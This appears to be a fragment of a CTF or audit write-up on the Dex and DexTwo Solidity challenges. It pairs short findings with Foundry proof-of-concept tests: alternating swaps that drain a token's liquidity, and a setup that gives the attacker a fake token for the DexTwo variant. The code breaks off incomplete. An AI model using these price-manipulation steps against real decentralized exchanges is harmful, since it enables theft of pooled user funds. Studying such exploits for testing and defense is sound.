An attacker can exploit the Dex contract by performing a series of swaps to drain the liquidity of one of the tokens, token1 or token2.
function test_multiple_swaps() public {
token1.approve(address(dex), 100);
token2.approve(address(dex), 100);
uint256 token1Expected = token1.balanceOf(address(dex));
dex.swap(address(token1), address(token2), 10);
dex.swap(address(token2), address(token1), 20);
dex.swap(address(token1), address(token2), 24);
dex.swap(address(token2), address(token1), 30);
dex.swap(address(token1), address(token2), 41);
dex.swap(address(token2), address(token1), 45);
uint256 token1Balance = token1.balanceOf(attacker);
uint256 token1ExpectedAfter = token1.balanceOf(address(dex));
assert(token1Balance == token1Expected + 10);
assertEq(token1ExpectedAfter, 0);
An attacker can exploit the Dex contract by performing a series of swaps to drain the liquidity of the two token, token1 & token2.
Attacker - The attacker make some series of swaps to the DEX to drain the liquidity of the two tokens
function setUp() public {
dex = new DexTwo(owner);
token1 = new SwappableTokenTwo(address(dex), "Token1", "TK1", 110);
token2 = new SwappableTokenTwo(address(dex), "Token2", "TK2", 110);
dex.setTokens(address(token1), address(token2));
console.log("Owner Token1 Balance before transfer:", token1.balanceOf(owner));
token1.approve(address(dex), 100);
token2.approve(address(dex), 100);
dex.add_liquidity(address(token1), 100);
dex.add_liquidity(address(token2), 100);
console.log("Owner Token1 Balance After transfer:", token1.balanceOf(owner));
// Deploy FakeToken
fakeToken = new FakeToken(owner, "fakeToken", "MTK", 500);
fakeToken.transfer(attacker, 400);
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